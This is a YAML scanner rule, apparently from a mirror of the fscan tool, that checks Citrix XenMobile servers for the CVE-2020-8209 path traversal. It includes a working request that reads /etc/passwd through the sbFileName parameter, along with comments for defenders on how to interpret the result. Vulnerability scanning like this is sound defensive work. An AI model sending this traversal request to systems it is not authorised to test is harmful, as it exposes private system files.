mirror of https://github.com/qwqdanchun/fscan.git
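# Detection rule for CVE-2020-8209, a path traversal in Citrix XenMobile
# (see the NVD link under detail.links for affected builds and the fix).
#
# Reading the result:
#   - A match means the server returned file content from outside the web
#     root in response to a single GET; treat the host as unpatched.
#   - No match is not proof of a patched host: a proxy or WAF in front of it,
#     or a different directory depth, would also produce a miss.
#
# Log signal for defenders: requests to /jsp/help-sb-download.jsp whose
# sbFileName parameter contains "../" sequences.
name: poc-yaml-citrix-xenmobile-cve-2020-8209
rules:
  - method: GET
    # The rule sets no headers, cookies or body; the request is sent as-is.
    path: /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
    # Redirects are not followed, so a 302 to a login page is evaluated as
    # the response itself and fails the status check below.
    follow_redirects: false
    # All three conditions must hold, which keeps false positives down:
    #   1. HTTP 200,
    #   2. a download-style content type containing "octet-stream",
    #   3. the body matches the root entry of a passwd file.
    # NOTE(review): "^" presumably anchors to the start of the body only
    # (no multiline flag), so the root entry must be the first line - confirm
    # against the rule engine's regex semantics.
    expression: |
      response.status == 200 && response.content_type.contains("octet-stream") && "^root:[x*]:0:0:".bmatches(response.body)
detail:
  author: B1anda0(https://github.com/B1anda0)
  links:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8209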